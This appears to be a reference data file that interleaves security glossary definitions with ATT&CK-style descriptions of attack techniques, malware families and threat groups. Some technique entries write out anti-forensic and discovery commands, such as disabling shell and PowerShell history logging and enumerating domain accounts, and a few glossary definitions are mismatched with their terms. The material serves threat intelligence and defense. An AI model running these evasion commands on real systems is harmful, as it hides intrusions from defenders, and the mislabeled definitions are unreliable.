Definition: An IoT device and any other product components necessary to use the IoT device.

Name: Internal Proxy
Type: attack-pattern
Description: Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

Term: configuration baseline
Definition: See Baseline Configuration.

Term: Root Cause Analysis
Definition: A principle-based, systems approach for the identification of underlying causes associated with a particular set of risks.

Term: architecture framework
Definition: Conventions, principles, and practices for the description of architectures established within a specific domain of application and/or community of stakeholders.

Term: collision
Definition: Two or more distinct inputs produce the same output. Also see hash function.

Term: trust anchor
Definition: A public or symmetric key that is trusted because it is directly built into hardware or software, or securely provisioned via out-of-band means, rather than because it is vouched for by another trusted entity (e.g. in a public key certificate). A trust anchor may have name or policy constraints limiting its scope.

Term: IS
Definition: The term 'information system' means a discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.

Term: hash digest
Definition: See “message digest”.

Term: Signature validation
Definition: The (mathematical) verification of the digital signature and obtaining the appropriate assurances (e.g., public-key validity, private-key possession, etc.).

Name: Nerex
Type: malware
Description: Nerex is a Trojan used by Elderwood to open a backdoor on compromised hosts.

Term: OLIR Developer
Definition: See Informative Reference Developer.

Term: Issuing Facility
Definition: A physical site or location—including all equipment, staff, and documentation—that is responsible for carrying out one or more of the following PIV functions: identity proofing and registration; card and token production; activation and issuance; post-issuance binding of derived PIV credentials; and maintenance.

Term: Source authentication
Definition: The process of providing assurance about the source of information. Sometimes called identity authentication or origin authentication.

Term: <em>Null</em>
Definition: The empty bit string.

Term: impact level
Definition: The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability.

Name: LoudMiner
Type: malware
Description: LoudMiner is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.

Term: <span class="math-tex">\(\varepsilon\)</span>
Definition: A positive constant that is assumed to be no greater than&nbsp;<span class="math-tex">\(2^{-32}\)</span>

Term: Keyed Hash Algorithm
Definition: An algorithm that creates a message authentication code based on both a message and a secret key shared by two endpoints. Also known as a hash message authentication code algorithm.

Name: Generate Content
Type: attack-pattern
Description: Adversaries may create or generate content to support targeting and operations. This content may be used to establish personas, impersonate known individuals or organizations, and support Social Engineering, fraud, or influence activities. Written materials, audio, images, video, or other media may be developed and tailored to the target and objective.

Content development may occur prior to or during an operation. Adversaries may develop or generate content in-house, source it through third parties, or produce it using AI-assisted tools. Adversaries may use AI to research targets, develop pretexts, and better understand the organizations and individuals they intend to target or deceive prior to generating content (i.e., Query Public AI Services); for obtaining access to AI tools used in content generation, see Artificial Intelligence. 

Content may be leveraged in support of techniques such as Phishing, Phishing for Information, Social Engineering, Financial Theft, or Establish Accounts. Generated or developed content does not include malicious code or scripts (i.e., Develop Capabilities and Artificial Intelligence).

Term: PAP
Definition: Provides a user interface for creating, managing, testing, and debugging digital policies and metapolicies, and storing these policies in the appropriate repository.

Term: Specification Limit
Definition: See Limit, Specification.

Name: Distributed Component Object Model
Type: attack-pattern
Description: Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM.

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications as well as other Windows objects that contain insecure methods. DCOM can also execute macros in existing documents and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application, bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with Windows Management Instrumentation.

Term: Standards Developing Organization
Definition: any organization that develops and approves standards using various methods to establish consensus among its participants. Such organizations may be: accredited, such as ANSI -accredited IEEE; international treaty based, such as the ITU- T; private sector based, such as ISO/IEC; an international consortium, such as OASIS or IETF; or a government agency.

Name: ShinyHunters
Type: intrusion-set
Description: ShinyHunters is a cyber criminal collective that has been active since at least 2019 operating under the ShinyCorp persona. ShinyHunters has targeted multiple industries and geographic regions gathering legitimate credentials and personally identifiable information (PII) for resale or extortion of victims. ShinyHunters has been associated with the broader collective called The Community, also known as The Com whose members have also included Scattered Spider and LAPSUS$. Public reporting has mentioned a variety of names for operations ShinyHunters members have reportedly conducted with members of other groups, including “Scattered Lapsus Hunters,” “Scattered Lapsus Shiny Hunters,” and “SLSH.”

Term: Requester
Definition: A person, organization, device, hardware, network, software, or service. In these guidelines, a subject is a natural person.

Term: approved
Definition: FIPS-approved, NIST-Recommended and/or validated by the Cryptographic Algorithm Validation Program (CAVP).

Term: keying material
Definition: Data that is represented as a binary string such that any non-overlapping segments of the string with the required lengths can be used as symmetric cryptographic keys. In this Recommendation, keying material is derived from a shared secret established during an execution of a key-establishment scheme or generated by the sender in a key-transport scheme. As used in this Recommendation, secret keying material may include keys, secret initialization vectors, and other secret parameters.

Term: Data Encryption Algorithm
Definition: Data Encryption Algorithm, previously specified in FIPS 46 (now withdrawn).

Term: security policy filter
Definition: A hardware and/or software component that performs one or more of the following functions: content verification to ensure the data type of the submitted content; content inspection to analyze the submitted content and verify that complies with a defined policy; malicious content checker that evaluates the content for malicious code; suspicious activity checker that evaluates or executes the content in a safe manner, such as in a sandbox or detonation chamber and monitors for suspicious activity; or content sanitization, cleansing, and transformation, which modifies the submitted content to comply with a defined policy.

Term: Opportunity
Definition: A condition that may result in a beneficial outcome.

Term: hash digest
Definition: The fixed-length bit string produced by a hash function.

Name: Data Manipulation
Type: attack-pattern
Description: Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Term: nonce
Definition: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols SHALL not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge, because a nonce is not necessarily unpredictable.

Term: message digest
Definition: See Digital Fingerprint

Term: processing
Definition: Operation or set of operations performed upon PII that can include, but is not limited to, the collection, retention, logging, generation, transformation, use, disclosure, transfer, and disposal of PII.

Term: Information System User
Definition: A human entity.

Term: next generation encryption (NGE)
Definition: An NSA portfolio of development programs to support the DoD's Cryptographic Modernization Initiative to modernize the NSA-certified cryptographic product inventory.

Term: control baseline
Definition: Formally approved version of a configuration item, regardless of media, formally designated and fixed at a specific time during the configuration item’s life cycle.

Term: privileged account
Definition: A system account with authorizations of a privileged user.

Term: Owner
Definition: 2. For a symmetric key (i.e., a secret key), the entity or entities that are authorized to share and use the key.

Term: Common Vulnerabilities and Exposures identifiers
Definition: An identifier for a specific software flaw defined within the official CVE Dictionary and that conforms to the CVE specification.

Term: system security plan
Definition: A system document that provides an overview of the security requirements of a system and describes the controls in place to meet those requirements.

Name: Container CLI/API
Type: attack-pattern
Description: Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments.

The Docker CLI is used for managing containers via an exposed API point from the `dockerd` daemon. Some common examples of Docker CLI include Docker Desktop CLI and Docker Compose, but users are also able to use SDKs to interact with the API. For example, Docker SDK for Python can be used to run commands within a Python application.

Adversaries may leverage the Docker CLI, API, or SDK to pull or build Docker images (i.e., Ingress Tool Transfer, Build Image on Host), run containers (i.e., Deploy Container), or execute commands inside running containers (i.e., Container Administration Command). In some cases, threat actors may pull legitimate images that include scripts or tools that they can leverage - for example, using an image that includes the `curl` command to download payloads. Adversaries may also utilize `docker inspect` and `docker ps` to scan for cloud environment variables and other running containers (i.e., Container and Resource Discovery).

Kubernetes is responsible for the management and orchestration of containers across clusters. The Kubernetes control plane, which manages the state of the cluster and is responsible for scheduling, communication, and resource monitoring, can be invoked directly via the API or indirectly via CLI tools such as `kubectl`. It may also be accessed within client libraries such as Go or Python. By utilizing the API, administrators can interact with resources within the cluster such as listing or creating pods, which is a group of one or more containers. Adversaries call the API server via `curl` or other tools, allowing them to obtain further information about the environment such as pods, deployments, daemonsets, namespaces, or sysvars. They may also run various commands regarding resource management.

Term: Owner
Definition: For a key pair, the owner is the entity that is authorized to use the private key associated with a public key, whether that entity generated the key pair itself or a trusted party generated the key pair for the entity.

Term: Security properties
Definition: The security features (e.g., replay protection, or key confirmation) that a cryptographic scheme may, or may not, provide.

Term: Virtualization
Definition: A methodology for emulation or abstraction of hardware resources that enables complete execution stacks including software applications to run on it.

Term: FCKMS Security Domain
Definition: A collection of entities that share a common FCKMS Security Policy

Term: literacy
Definition: An individual’s familiarity with a basic set of knowledge.

Term: identity
Definition: The set of physical and behavioral characteristics by which an individual is uniquely recognizable.

Term: Downgrading
Definition: An authorized reduction in the level of protection to be provided to specified information, e.g., from a Moderate impact-level down to a Low impact-level.

Term: <em>Symbol</em>
Definition: The value of the noise source output (i.e., sample value).

Name: Koadic
Type: tool
Description: Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.

Term: Antivirus Software
Definition: A program that monitors a computer or network to identify all major types of malware and prevent or contain malware incidents.

Term: ICT Supply Chain
Definition: Linked set of resources and processes between acquirers, integrators, and suppliers that begins with the design of ICT products and services and extends through development, sourcing, manufacturing, handling, and delivery of ICT products and services to the acquirer.  
Note: An ICT supply chain can include vendors, manufacturing facilities, logistics providers, distribution centers, distributors, wholesalers, and other organizations involved in the manufacturing, processing, design and development, handling and delivery of the products, or service providers involved in the operation, management, and delivery of the services.

Name: Ignore Process Interrupts
Type: attack-pattern
Description: Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off. These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. 

Adversaries may invoke processes using `nohup`, PowerShell `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups. This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.

Hiding from process interrupt signals may allow malware to continue execution, but unlike Trap this does not establish Persistence since the process will not be re-invoked once actually terminated.

Name: Domain Account
Type: attack-pattern
Description: Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the Net utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. PowerShell cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.

Term: POA&M
Definition: A document for a system that “identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones in meeting the tasks, and scheduled completion dates for the milestones.” [13]

Term: SCAP Capability
Definition: A specific function or functions of a product as defined below:
Authenticated Configuration Scanner: the capability to audit and assess a target system to determine its compliance with a defined set of configuration requirements using target system logon privileges.
Common Vulnerabilities and Exposures (CVE) Option: the capability to process and present CVEs correctly and completely.
Open Checklist Interactive Language (OCIL) Option: the capability to process and present OCIL correctly and completely.

Name: Credential API Hooking
Type: attack-pattern
Description: Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or function calls that include parameters that reveal user authentication credentials. Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials. 

In Windows, hooking involves redirecting calls to these functions and can be implemented via:

* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.

In Linux and macOS, adversaries may hook into system functions via the `LD_PRELOAD` (Linux) or `DYLD_INSERT_LIBRARIES` (macOS) environment variables, which enables loading shared libraries into a program’s address space. For example, an adversary may capture credentials by hooking into the `libc read` function leveraged by SSH or SCP.

Term: Operational storage
Definition: Storage within an FCKMS where the key can be accessed to perform cryptographic functions during normal operations.

Term: Mining
Definition: The act of solving a puzzle within a proof of work consensus model.

Term: Risk Detail Report
Definition: A report listing detailed risk scenario information supporting the contents of a risk register entry including, but not limited to, risk history information, risk analysis data, and information about individual and organizational accountability.

Name: XORIndex Loader
Type: malware
Description: XORIndex Loader is a XOR-encoded loader that collects host data, decodes follow-on scripts and acts as a downloader for the BeaverTail malware. XORIndex Loader was first reported in June 2025. XORIndex Loader has been leveraged by North Korea-affiliated threat actors identified as Contagious Interview. XORIndex Loader has been delivered to victims through code repository sites utilizing typo squatting naming conventions of various npm packages.

Name: MarkiRAT
Type: malware
Description: MarkiRAT is a remote access Trojan (RAT) compiled with Visual Studio that has been used by Ferocious Kitten since at least 2015.

Term: public
Definition: Any entity or person who might be impacted by or need to take action for a specific vulnerability; intended to be loosely interpreted.

Term: system owner (or program manager)
Definition: Official responsible for the procurement, development, integration, modification, operation, and maintenance of a system.

Name: Derusbi
Type: malware
Description: Derusbi is malware used by multiple Chinese APT groups. Both Windows and Linux variants have been observed.

Term: COMSEC material control system
Definition: The logistics and accounting system through which COMSEC material marked CRYPTO is distributed, controlled, and safeguarded. Included are the COMSEC central offices of record (COR), cryptologistic depots, and COMSEC accounts. COMSEC material other than key may be handled through the CMCS. Electronic Key Management System (EKMS) and Key Management Infrastructure (KMI) are examples of tools used by the CMCS to accomplish its functions.

Term: security functions
Definition: The hardware, software, or firmware of the system responsible for enforcing the system security policy and supporting the isolation of code and data on which the protection is based.

Term: PRNG
Definition: See Deterministic Random Bit Generator.

Name: Compression
Type: attack-pattern
Description: Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., Fileless Storage).

In order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.

File archives may be sent as one Spearphishing Attachment through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., Malicious File). However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.

Compression may be used in combination with Encrypted/Encoded File where compressed files are encrypted and password-protected.

Term: Key derivation
Definition: The process that derives keying material from a key.

Term: privacy budget
Definition: An upper bound on allowable cumulative privacy loss across all analyses that process a single dataset.

Term: Retention period
Definition: The minimum amount of time that a key or other cryptographically related information should be retained in an archive.

Name: meek
Type: tool
Description: meek is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

Term: <em>C*n</em>
Definition: The last block of the ciphertext, which may be a partial block.

Term: Object, Assessment
Definition: the set of passive entities within the system, protected from unauthorized use.

Term: <em>timestamp_signatureTTA</em>
Definition: A digital signature that is generated using a TTA’s private signature key.

Name: NetTraveler
Type: malware
Description: NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013.

Term: DI
Definition: The property that data has not been altered by an unauthorized entity.

Term: authorize processing
Definition: also known as authorize processing (OMB Circular A-130, Appendix III),and approval to operate. Accreditation (or authorization to process information) is granted by a management official and provides an important quality control. By accrediting a system or application, a manager accepts the associated risk. Accreditation (authorization) must be based on a review of controls. (See Certification.)

Name: HEXANE
Type: intrusion-set
Description: HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.

Term: ID
Definition: A bit string that is associated with a person, device or organization. It may be an identifying name, or may be something more abstract (for example, a string consisting of an Internet Protocol (IP) address and timestamp).

Term: Cryptographic application
Definition: An application that performs a cryptographic function.

Term: key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines the specific operation of that algorithm.

Name: LAPSUS$
Type: intrusion-set
Description: LAPSUS$ is cyber criminal threat group that has been active since at least mid-2021. LAPSUS$ specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.

Term: <strong>Should</strong>
Definition: Used to indicate a strong recommendation but not a requirement of this document. Ignoring the recommendation could lead to undesirable results.

Name: Action RAT
Type: malware
Description: Action RAT is a remote access tool written in Delphi that has been used by SideCopy since at least December 2021 against Indian and Afghani government personnel.

Term: [<i>T</i>]<sub>2</sub>
Definition: A binary representation for the integer <i>T</i> (using an agreed-upon length and bit order).

Term: authorize processing
Definition: Access privileges that are granted to an entity; conveying an “official” sanction to perform a security function or activity.

Term: SHA-3
Definition: Secure Hash Algorithm-3.

Term: <i>X&nbsp;</i>:= <i>Y</i>
Definition: <i>X</i> is defined to be equal to <i>Y.</i>

Term: AES
Definition: Advanced Encryption Standard specified in [FIPS 197].

Term: DVD-Recordable
Definition: A write-once (read only) DVD for both movies and data endorsed by the DVD Forum.

Name: Operation Wocao
Type: campaign
Description: Operation Wocao was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.

Security researchers assessed the Operation Wocao actors used similar TTPs and tools as APT20, suggesting a possible overlap. Operation Wocao was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.

Term: Test
Definition: A type of assessment method that is characterized by the process of exercising one or more assessment objects under specified conditions to compare actual with expected behavior, the results of which are used to support the determination of security control or privacy control effectiveness over time.

Term: time interval
Definition: The elapsed time between two events. In time and frequency metrology, time interval is usually measured in small fractions of a second, such as milliseconds, microseconds, or nanoseconds. Higher resolution time interval measurements are often made with a time interval counter.

Term: countermeasures
Definition: The safeguards or countermeasures prescribed for an information system or an organization to protect the confidentiality, integrity, and availability of the system and its information.

Term: Compact Disc-Recordable
Definition: ACompact Disc Recordable(CD-R) is aCD thatcan be written on only once but read manytimes. Also known as WORM.

Term: cipher
Definition: Series of transformations that converts plaintext to ciphertext using the Cipher Key.

Term: system security requirement
Definition: System requirements that have security relevance. System security requirements define the protection capabilities provided by the system, the performance and behavioral characteristics exhibited by the system, and the evidence used to determine that the system security requirements have been satisfied. 
Note: Each system security requirement is expressed in a manner that makes verification possible via analysis, observation, test, inspection, measurement, or other defined and achievable means.

Term: chief information security officer
Definition: See senior agency information security officer (SAISO).

Term: <em>ss_Mi</em>
Definition: The security strength that can be supported by the combination of the methods used to generate a key Ki, and the methods used to protect it after generation (e.g., during key-transport and/or storage)

Term: cryptographic randomization
Definition: Function that randomly determines the transmit state of a cryptographic logic.

Term: Transport Mode
Definition: IPsec mode that does not create a new IP header for each protected packet.

Term: umbilical cord
Definition: The cable that connects the space vehicle to the launch pad during pre-launch to monitor the vehicle health and is disconnected or cut when the vehicle launches; enables the exchange of data with ground launch mission systems.

Name: Felismus
Type: malware
Description: Felismus is a modular backdoor that has been used by Sowbug.

Term: system element
Definition: Smallest selectable set of elements on which requirements may be based.

Name: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Type: attack-pattern
Description: Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

Term: project
Definition: Endeavor with defined start and finish criteria undertaken to create a product or service in accordance with specified resources and requirements.

Term: <em>Null</em>
Definition: The empty bit string

Term: Broad network access
Definition: Capabilities are available over the network and accessed through standard mechanisms that promote use by heterogeneous thin or thick client platforms (e.g., mobile phones, tablets, laptops, and workstations).

Term: DRM
Definition: A potential mapping between Reference Document Elements identified by finding elements from two or more Reference Documents that map to the same Focal Document Element.

Term: message digest
Definition: The result of applying a hash function to information.

Name: WarzoneRAT
Type: malware
Description: WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.

Term: key
Definition: <p>A parameter used in conjunction with a cryptographic algorithm that deter-mines its operation. Examples of cryptographic algorithms applicable to this standard include:</p><p>1. The computation of a digital signature from data</p><p>2. The verification of a digital signature</p>

Term: Key registration
Definition: A stage in the lifecycle of keying material; the process of officially recording the keying material by a registration authority.

Name: Cloud Application Integration
Type: attack-pattern
Description: Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the environment, or even co-opt an existing integration to achieve malicious ends.

OAuth is an open standard that allows users to authorize applications to access their information on their behalf. In a SaaS environment such as Microsoft 365 or Google Workspace, users may integrate applications to improve their workflow and achieve tasks. 

Leveraging application integrations may allow adversaries to persist in an environment – for example, by granting consent to an application from a high-privileged adversary-controlled account in order to maintain access to its data, even in the event of losing access to the account. In some cases, integrations may remain valid even after the original consenting user account is disabled. Application integrations may also allow adversaries to bypass multi-factor authentication requirements through the use of Application Access Tokens. Finally, they may enable persistent Automated Exfiltration over time.

Creating or adding a new application may require the adversary to create a dedicated Cloud Account for the application and assign it Additional Cloud Roles – for example, in Microsoft 365 environments, an application can only access resources via an associated service principal.

Term: Key derivation
Definition: A function in the lifecycle of keying material; the process by which one or more keys are derived from either a pre-shared key, or a shared secret and other information.

Term: criticality
Definition: Refers to the (consequences of) incorrect behavior of a system. The more serious the expected direct and indirect effects of incorrect behavior, the higher the criticality level.

Term: portable storage device
Definition: An information system component that can be inserted into and removed from an information system, and that is used to store data or information (e.g., text, video, audio, and/or image data). Such components are typically implemented on magnetic, optical, or solid state devices (e.g., floppy disks, compact/digital video disks, flash/thumb drives, external hard disk drives, and flash memory cards/drives that contain non-volatile memory).

Term: PNT system
Definition: The components, processes, and parameters that collectively produce the final PNT solution for the consumer.

Term: Component Test
Definition: A test of individual hardware and software components or groups of related components.

Term: Key-confirmation provider
Definition: The party that provides assurance to the other party (the recipient) that the two parties have indeed established a shared secret or shared keying material.

Name: SHOTPUT
Type: malware
Description: SHOTPUT is a custom backdoor used by APT3.

Term: element
Definition: Organizations, entities, or tools employed for the research and development, design, manufacturing, acquisition, delivery, integration, operations and maintenance, and disposal of systems and system components.

Term: multimodal models
Definition: A model that processes and relates information from multiple sensory modalities that each represent primary human channels of communication and sensation, such as vision and touch.

Term: SC
Definition: The characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, or individuals.

Name: System Language Discovery
Type: attack-pattern
Description: Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.

There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Query Registry and calls to Native API functions. 

For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.

On a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.

Term: Target Vulnerability Validation Techniques
Definition: Active information security testing techniques that corroborate the existence of vulnerabilities. They include password cracking, remote access testing, penetration testing, social engineering, and physical security testing.

Term: architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected.
Note: The security architecture reflects security domains, the placement of security-relevant elements within the security domains, the interconnections and trust relationships between the security-relevant elements, and the behavior and interactions between the security-relevant elements. The security architecture, similar to the system architecture, may be expressed at different levels of abstraction and with different scopes.

Term: Non-Technology-Based Input Product
Definition: Manufactured component parts or materials used in the organization manufacturing process that do not incorporate information technology and are provided by third-parties.

Term: Key-derivation function
Definition: As used in this Recommendation, a function used to derive secret keying material from a shared secret (or a key) and other information.

Term: processing
Definition: Operation or set of operations performed upon PII that can include but is not limited to the collection, retention, logging, generation, transformation, use, disclosure, transfer, and disposal of PII.

Term: Managed Environment
Definition: Environment comprising centrally managed IT products, everything ranging from servers and printers to desktops, laptops, smartphones, and tablets.

Term: access control
Definition: The process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., federal buildings, military establishments, border crossing entrances).

Term: SMS
Definition: a mobile phone network facility that allows users to send and receive alphanumeric text messages of up to 160 characters on their cell phone or other handheld device

Name: Prevent Command History Logging
Type: attack-pattern
Description: Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they have done.

On Linux and macOS, command history is tracked in a file pointed to by the environment variable `HISTFILE`. When a user logs off a system, this information is flushed to a file in the user's home directory called `~/.bash_history`. The `HISTCONTROL` environment variable keeps track of what should be saved by the history command and eventually into the `~/.bash_history` file when a user logs out. `HISTCONTROL` does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.

Adversaries may clear the history environment variable (`unset HISTFILE`) or set the command history size to zero (`export HISTFILESIZE=0`) to prevent logging of commands. Additionally, `HISTCONTROL` can be configured to ignore commands that start with a space by simply setting it to "ignorespace". `HISTCONTROL` can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that " ls" will not be saved, but "ls" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.

On Windows systems, the `PSReadLine` module tracks commands used in all PowerShell sessions and writes them to a file (`$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` by default). Adversaries may change where these logs are saved using `Set-PSReadLineOption -HistorySavePath {File Path}`. This will cause `ConsoleHost_history.txt` to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.

Adversaries may also leverage a Network Device CLI on network devices to disable historical command logging (e.g. `no logging`).

Term: <em>fn</em>
Definition: The sum of the log2 distances between matching L-bit templates, i.e., the sum of the number of digits in the distance between L-bit templates. See Sections 2.9 and 3.9.

Term: SDO
Definition: any organization that develops and approves standards using various methods to establish consensus among its participants. Such organizations may be: accredited, such as ANSI -accredited IEEE; international treaty based, such as the ITU- T; private sector based, such as ISO/IEC; an international consortium, such as OASIS or IETF; or a government agency.

Term: forgery
Definition: A (ciphertext, tag) pair produced by an adversary who is not knowledgeable of the secret key and yet is accepted as valid by the verified decryption procedure.

Name: Mongall
Type: malware
Description: Mongall is a backdoor that has been used since at least 2013, including by Aoqin Dragon.

Name: Nidiran
Type: malware
Description: Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise.

Term: ACL
Definition: A list of entities, together with their access rights, that are authorized to have access to a resource.

Term: <em>H(x)</em>
Definition: A cryptographic hash function with x as an input

Term: Multipurpose Internet Mail Extensions (MIME)
Definition: A protocol that makes use of the headers in an IETF RFC 2822 message to describe the structure of rich message content.

Term: firmware
Definition: The physical components of a system. See Software and Firmware.

Term: Random Bit Generator (RBG)
Definition: A device or algorithm that can produce a sequence of bits that appear to be both statistically independent and unbiased.

Name: CSPY Downloader
Type: tool
Description: CSPY Downloader is a tool designed to evade analysis and download additional payloads used by Kimsuky.

Term: COMSEC manager
Definition: An individual designated by proper authority to be responsible for the receipt, transfer, accountability, safeguarding, and destruction of COMSEC material assigned to a COMSEC account. This applies to both primary accounts and subaccounts. The equivalent key management infrastructure (KMI) position is the KMI operating account (KOA) manager.

Term: identity verification
Definition: Confirmation, through the provision of objective evidence, that specified requirements have been fulfilled (e.g., an entity’s requirements have been correctly defined, or an entity’s attributes have been correctly presented; or a procedure or function performs as intended and leads to the expected outcome). Adapted from Verification.

Name: Olympic Destroyer
Type: malware
